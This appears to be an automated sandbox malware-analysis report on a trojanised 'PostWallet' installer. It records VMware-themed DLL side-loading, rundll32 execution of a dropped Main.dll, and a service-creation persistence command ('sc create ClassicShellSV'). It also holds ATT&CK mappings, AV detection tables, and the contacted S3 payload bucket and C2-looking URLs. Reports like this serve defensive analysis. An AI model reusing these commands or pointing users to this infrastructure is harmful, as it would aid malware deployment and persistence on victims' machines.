          Source: FilePost?a.exe.2.drBinary or memory string: User not authorized for vpx agent contactvmware-vpxaUser not authorized for vmx contactConnecting socket=%s
          Source: Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0http://defaultcontainer/lib/net48/vmwarebase.dll
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetExpiration
          Source: FilePost?a.exe.2.drBinary or memory string: Invalid pathname (too long)Config file not found: %sVMware Server ConsoleYou need read access in order to connect with the %s. Access denied for config file: %sYou need execute access in order to connect with the %s. Access denied for config file: %s%s-fdConnect %sError connecting to %s service instance.Can't create mutex '%s' (%d)Timeout acquiring thread lock.-fdCould not open %s process %d. (error %d)Error connecting to vmx process.No such %s process: %s
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: W32Util_GetVmwareCommonAppDataFilePath
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetPresent
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-vpxa
          Source: FilePost?a.exe.2.drBinary or memory string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00348F80 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00348F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D1837F3 mov eax, dword ptr fs:[00000030h]3_2_6D1837F3
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D179141 mov eax, dword ptr fs:[00000030h]3_2_6D179141
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D18494E GetProcessHeap,3_2_6D18494E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_003490E3 SetUnhandledExceptionFilter,3_2_003490E3
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_003484CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_003484CB
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00348F80 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00348F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D16855E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6D16855E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D17300E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6D17300E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D168334 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6D168334
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6E39F81F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E39F81F
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 16.12.1.14 443
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D144A50 ShellExecuteExW,WaitForSingleObject,CloseHandle,GetClassNameW,lstrcmpW,ShowWindow,3_2_6D144A50
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00344850 AllocateAndInitializeSid,calloc,InitializeAcl,GetLastError,Warning,AddAccessAllowedAce,GetLastError,Warning,IsValidAcl,GetLastError,Warning,LocalAlloc,InitializeSecurityDescriptor,GetLastError,Warning,SetSecurityDescriptorDacl,GetLastError,Warning,IsValidSecurityDescriptor,GetLastError,Warning,CreateNamedPipeW,GetLastError,Warning,CreateEventW,GetLastError,Warning,FreeSid,free,LocalFree,CloseHandle,CloseHandle,ConnectNamedPipe,GetLastError,GetLastError,Warning,FreeSid,free,LocalFree,3_2_00344850
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00344850 AllocateAndInitializeSid,calloc,InitializeAcl,GetLastError,Warning,AddAccessAllowedAce,GetLastError,Warning,IsValidAcl,GetLastError,Warning,LocalAlloc,InitializeSecurityDescriptor,GetLastError,Warning,SetSecurityDescriptorDacl,GetLastError,Warning,IsValidSecurityDescriptor,GetLastError,Warning,CreateNamedPipeW,GetLastError,Warning,CreateEventW,GetLastError,Warning,FreeSid,free,LocalFree,CloseHandle,CloseHandle,ConnectNamedPipe,GetLastError,GetLastError,Warning,FreeSid,free,LocalFree,3_2_00344850
          Source: ClassicIE_64.dll.12.drBinary or memory string: bn2.txtShell_TrayWnd
          Source: ClassicIE_64.dll.12.drBinary or memory string: ;Shell_TrayWndH
          Source: ClassicStartMenu.exe.12.drBinary or memory string: UStartMenu: hook failed: 0x%08XStartMenu: can't find taskbar, retryingStartMenu: failed to open process %dStartMenu: failed to get process nameStartMenu: found wrong process %sexplorer.exeStartMenu: can't find Progman, retryingProgmanApplicationManager_DesktopShellWindowSoftware\IvoSoft\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txtStartMenu: hooking ExplorerClassicStartMenuDLL.dllClassicStartMenu.StartMenuMsgATL:%pStartMenu: Taskbar CreatedClassicStartMenu.CStartHookWindow`
          Source: ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drBinary or memory string: ProgmanCabinetWClass
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00348D9F cpuid 3_2_00348D9F
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,3_2_6D186DEB
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6D186F11
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,3_2_6D17EF3A
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,3_2_6D186980
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,3_2_6D186B0D
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_6D186B98
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,3_2_6D186A27
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,3_2_6D186A72
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,3_2_6D186785
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,3_2_6D187017
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6D1870E6
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,3_2_6D17F3FF
          Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,12_2_00415230
          Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004142E0
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00344850 AllocateAndInitializeSid,calloc,InitializeAcl,GetLastError,Warning,AddAccessAllowedAce,GetLastError,Warning,IsValidAcl,GetLastError,Warning,LocalAlloc,InitializeSecurityDescriptor,GetLastError,Warning,SetSecurityDescriptorDacl,GetLastError,Warning,IsValidSecurityDescriptor,GetLastError,Warning,CreateNamedPipeW,GetLastError,Warning,CreateEventW,GetLastError,Warning,FreeSid,free,LocalFree,CloseHandle,CloseHandle,ConnectNamedPipe,GetLastError,GetLastError,Warning,FreeSid,free,LocalFree,3_2_00344850
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeCode function: 0_2_0061B06B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0061B06B
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00346810 calloc,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,ImpersonateLoggedOnUser,GetLastError,GetUserNameW,RevertToSelf,GetLastError,Warning,Warning,free,Warning,Warning,GetEnvironmentStringsW,GetLastError,CreateEnvironmentBlock,GetLastError,GetLastError,LoadUserProfileW,GetLastError,CreateEnvironmentBlock,GetLastError,GetLastError,SetEnvironmentVariableW,FreeEnvironmentStringsW,DestroyEnvironmentBlock,DestroyEnvironmentBlock,free,UnloadUserProfile,CloseHandle,free,GetLastError,3_2_00346810
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00344B50 socket,setsockopt,WSAGetLastError,htonl,htons,bind,listen,WSAGetLastError,CreateEventW,GetLastError,WSAEventSelect,WSAGetLastError,CloseHandle,closesocket,3_2_00344B50
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
          Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 3 Service Execution | 5 Windows Service | 1 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Timestomp | NTDS | 44 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 5 Windows Service | 1 DLL Side-Loading | LSA Secrets | 231 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 113 Process Injection | 13 Masquerading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 1 Valid Accounts | DCSync | 141 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 141 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 113 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
          Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Rundll32 | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
          Behavior Graph (ID: 1404607; Sample: 00023948209303294#U00ac3203...; Startdate: 07/03/2024; Architecture: WINDOWS; Score: 80)
          Signatures: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Machine Learning detection for dropped file; Yara detected Generic Downloader
          DNS/IP: s3-r-w.sa-east-1.amazonaws.com; bucreate203920233.s3.sa-east-1.amazonaws.com
          Process: 00023948209303294#U00ac320302282349843984903.exe (started twice); the first instance dropped C:\Users\user\AppData\Local\...\Update.exe (PE32) and started Update.exe
          Process: Update.exe dropped C:\Users\user\AppData\...\vmwarebase.dll (PE32), C:\Users\user\AppData\...\vcruntime140.dll (PE32), C:\Users\user\AppData\...\FilePost?a.exe (PE32), C:\Users\user\AppData\Local\...\Update.exe (PE32) and started FilePost?a.exe
          Process: FilePost?a.exe (signature: Contain functionality to detect virtual machines) started FilePost?a.exe and conhost.exe
          Process: FilePost?a.exe (second instance) dropped C:\Users\user\AppData\Local\...\Main.dll (PE32+) and started cmd.exe and conhost.exe
          Process: cmd.exe started rundll32.exe and conhost.exe; rundll32.exe started a second rundll32.exe
          Process: rundll32.exe (second instance) connected to s3-r-w.sa-east-1.amazonaws.com 16.12.1.14, 443, 49729 unknown United States; dropped C:\Program Files\...\Windows XP Luna.skin (PE32), C:\Program Files\...\Windows Basic.skin (PE32), C:\Program Files\...\Windows Aero.skin7 (PE32) and 26 other malicious files; signatures: System process connects to network (likely due to code injection or exploit), Uses shutdown.exe to shutdown or reboot the system; started cmd.exe, shutdown.exe and conhost.exe
          Process: cmd.exe started conhost.exe and sc.exe; shutdown.exe started conhost.exe

          SourceDetectionScannerLabelLink
          00023948209303294#U00ac320302282349843984903.exe8%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Program Files\Classic Shell\ClassicIEDLL_64.dll100%Joe Sandbox ML
          C:\Program Files\Classic Shell\ClassicExplorer32.dll3%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorer32.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicExplorer64.dll3%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorer64.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicExplorerSettings.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorerSettings.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIEDLL_32.dll0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIEDLL_32.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIEDLL_64.dll17%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_32.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIE_32.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_64.dll18%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_64.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIE_64.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicShellUpdate.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicShellUpdate.exe1%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicStartMenu.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicStartMenu.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin70%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin70%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\EppManifest.dll0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\EppManifest.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Full Glass.skin0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Full Glass.skin0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Metallic.skin70%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Metallic.skin70%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://defaultcontainer/PostWallet.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/vcruntime140.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.bsdiff0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.diff0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.exe0%Avira URL Cloudsafe
          http://www.yoursite.com0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/FilePost?a.exe0%Avira URL Cloudsafe
          http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=0%Avira URL Cloudsafe
          http://defaultcontainer/_rels/.rels0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.rels0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.dll0%Avira URL Cloudsafe
          http://www.yoursite.com1%VirustotalBrowse
          http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=1%VirustotalBrowse
          http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/Main1.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.shasum0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/vmwarebase.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.psmdcp0%Avira URL Cloudsafe
          http://schemas.openxmlformats.or0%Avira URL Cloudsafe
          http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.p0%Avira URL Cloudsafe
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          s3-r-w.sa-east-1.amazonaws.com | 16.12.1.14 | true | false | | high
          bucreate203920233.s3.sa-east-1.amazonaws.com | unknown | unknown | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip | false | | high
                NameSourceMaliciousAntivirus DetectionReputation
                https://github.com/myuser/myrepoUpdate.exefalse
                  high
                  http://defaultcontainer/tempfiles/sample.bsdiffUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://www.vmware.com/0Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drfalse
                    high
                    http://defaultcontainer/lib/net48/vcruntime140.dllUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip8rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://www.classicshell.netClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drfalse
                        high
                        https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipvrundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://defaultcontainer/tempfiles/sample.diffUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://defaultcontainer/tempfiles/sample.nuspecUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.vmware.com/0/Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drfalse
                            high
                            https://api.github.com/#Update.exefalse
                              high
                              http://defaultcontainer/PostWallet.nuspecUpdate.exe, 00000002.00000002.1680892254.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002997000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://defaultcontainer/tempfiles/sample.exeUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://www.delphiforfun.org/rundll32.exe, rundll32.exe, 0000000C.00000002.4088855611.0000000000428000.00000020.00000001.01000000.0000000D.sdmp, Main.dll.7.dr, ClassicIE_64.dll.12.drfalse
                                high
                                https://bucreate203920233.s3.sa-east-1.amazonaws.com/rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.yoursite.comClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://bucreate203920233.s3.sa-east-1.amazonaws.com/Vh$orundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=ClassicIE_64.dll.12.drfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://defaultcontainer/lib/net48/FilePost?a.exeUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://defaultcontainer/_rels/.relsUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://defaultcontainer/tempfiles/sample.dllUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://defaultcontainer/tempfiles/sample.relsUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.htmlClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://defaultcontainer/lib/net48/Main1.dllUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://defaultcontainer/tempfiles/sample.shasumUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://defaultcontainer/lib/net48/vmwarebase.dllUpdate.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://www.classicshell.net/files/updates/update_PAClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drfalse
                                      high
                                      http://schemas.openxmlformats.orUpdate.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
